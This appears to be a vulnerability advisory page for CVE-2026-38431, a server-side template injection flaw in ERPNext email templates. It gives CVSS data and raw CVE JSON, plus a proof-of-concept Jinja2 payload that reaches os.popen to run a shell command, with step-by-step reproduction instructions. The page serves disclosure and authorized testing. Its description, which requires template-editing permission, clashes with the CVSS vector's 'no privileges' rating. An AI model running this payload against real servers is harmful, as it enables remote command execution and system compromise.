Security Vulnerability Report
中文
CVE-2026-38431 CVSS 9.8 CRITICAL

CVE-2026-38431

Published: 2026-05-05 17:17:05
Last Modified: 2026-05-08 17:06:43
Source: [email protected]

Description

ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE
ERPNext <= 15.103.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for ERPNext SSTI (CVE-2026-38431) # The attacker injects a malicious payload into the Email Template body field. # Standard Jinja2 SSTI payload to execute system commands payload = "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('id').read() }}" # Steps to reproduce: # 1. Login to ERPNext. # 2. Navigate to "Email Template" list. # 3. Create a new template or edit an existing one. # 4. Paste the payload into the HTML/Text content. # 5. Save the template. # 6. Trigger a notification or preview that renders this template. # 7. The server will execute 'id' and return the output in the rendered content.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38431", "sourceIdentifier": "[email protected]", "published": "2026-05-05T17:17:04.670", "lastModified": "2026-05-08T17:06:43.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionEndIncluding": "15.103.1", "matchCriteriaId": "1300B107-AF39-4DBD-86BA-406B38A0FB1C"}]}]}], "references": [{"url": "https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.